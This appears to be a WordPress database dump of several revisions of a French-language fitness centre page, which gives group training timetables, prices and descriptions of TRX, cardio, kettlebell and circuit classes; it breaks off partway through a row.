(160, 1, '2013-07-03 16:08:26', '2013-07-03 16:08:26', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\n[table caption=\"En semaine\" width=\"700\" colwidth=\"30|50|50|50|50|50\" colalign=\"right|left|left|left|left|left\"]\r\n,&lt;b&gt;Lundi[attr class=\"objectif\"]&lt;/b&gt;,&lt;b&gt;Mardi&lt;/b&gt;,&lt;b&gt;Mercredi&lt;/b&gt;,&lt;b&gt;Jeudi&lt;/b&gt;,&lt;b&gt;Vendredi&lt;/b&gt;\r\n&lt;b&gt;17h30&lt;/b&gt;,TRX,CARDIO,RIP-KETTLE,GLFE,TRX\r\n&lt;b&gt;18h15&lt;/b&gt;,GLFE,TRX,CARDIO,RIP-KETTLE,GLFE\r\n&lt;b&gt;19h00&lt;/b&gt;,RIP-KETTLE,GLFE,TRX,CARDIO,RIP-KETTLE\r\n&lt;b&gt;19h45&lt;/b&gt;,CARDIO,RIP-KETTLE,GLFE,TRX,CARDIO\r\n[/table]\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:08:26', '2013-07-03 16:08:26', '', 11, 'http://www.crosstrainingcenter.be/?p=160', 0, 'revision', '', 0),
(198, 1, '2013-07-03 17:41:28', '2013-07-03 17:41:28', '<h2>Team Training :</h2>\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 45%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:41:28', '2013-07-03 17:41:28', '', 11, 'http://www.crosstrainingcenter.be/?p=198', 0, 'revision', '', 0),
(173, 1, '2013-07-03 16:42:38', '2013-07-03 16:42:38', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\nEn semaine :\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"theure\">17h30</td>\r\n<td >TRX</td>\r\n<td >CARDIO</td>\r\n<td >RIP-KETTLE</td>\r\n<td >GLFE</td>\r\n<td>TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">18h15</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td  class=\"theure\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:42:38', '2013-07-03 16:42:38', '', 11, 'http://www.crosstrainingcenter.be/?p=173', 0, 'revision', '', 0),
(166, 1, '2013-07-03 16:29:16', '2013-07-03 16:29:16', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\nEn semaine :\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">Lundi</td>\r\n<td class=\"ttitre\">Mardi</td>\r\n<td class=\"ttitre\">Mercredi</td>\r\n<td class=\"ttitre\">Jeudi</td>\r\n<td class=\"ttitre\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan 